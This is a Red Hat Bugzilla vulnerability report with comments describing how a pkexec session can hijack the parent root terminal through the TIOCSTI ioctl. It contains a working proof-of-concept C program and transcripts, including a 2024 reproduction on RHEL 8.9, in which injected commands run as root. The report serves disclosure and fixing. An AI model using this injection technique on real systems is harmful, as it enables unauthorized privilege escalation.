Bug 1299955

Summary: pkexec tty hijacking via TIOCSTI ioctl
Product: [Other] Security Response Reporter: Federico Manuel Bento <up201407890>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: high Docs Contact:
Priority: high    
Version: unspecifiedCC: carnil, davidlewis4, sam
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2021-10-19 09:04:31 UTC Type: Bug
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On:    
Bug Blocks: 1300746    

Description Federico Manuel Bento 2016-01-19 15:37:52 UTC 
When executing a program via "pkexec --user nonpriv program" the nonpriv session can escape to the parent session by using the TIOCSTI ioctl to push characters into the terminal's input buffer, allowing privilege escalation.
This issue has been fixed in "su" CVE-2005-4890 by calling setsid() and in "sudo" by using the "use_pty" flag.

$ cat test.c
#include <sys/ioctl.h>

int main()
{
 char *cmd = "id\n";
 while(*cmd)
  ioctl(0, TIOCSTI, cmd++);
}

$ gcc test.c -o test
$ id
uid=1000(saken) gid=1000(saken) groups=1000(saken)

# pkexec --user saken ./test ----> last command i type in
id
# id ----> did not type this
uid=0(root) gid=0(root) groups=0(root)
Comment 1 David Lewis 2016-02-26 16:36:10 UTC 
You have to possess CAP_SYS_ADMIN to successfully invoke the TIOCSTI ioctl.  That implies to me that pkexec is allowing test to execute with that (and possibly other) capabilities.  If that's the case, you're merely running as root by another name.
Comment 2 David Lewis 2016-02-26 19:16:52 UTC 
Or you can pass that tty ownership check that's been in there seemingly forever... sorry for the noise.
Comment 4 Sam Morris 2024-05-02 09:04:47 UTC 
Has this actually been fixed? On a RHEL 8.9 system I've built the sample exploit from https://ruderich.org/simon/notes/su-sudo-from-root-tty-hijacking and it works:

  root@myhost:/var/tmp/tiocsti130# pkexec -u nobody /bin/bash
  bash-4.4$ /var/tmp/tiocsti/tiocsti  # <-- this is me running the exploit, subsequent output is caused by the exploit hijacking my terminal
  exit
  echo Payload as `whoami`
  bash-4.4$ exit
  exit
  root@myhost:/var/tmp/tiocsti# echo Payload as `whoami`
  Payload as root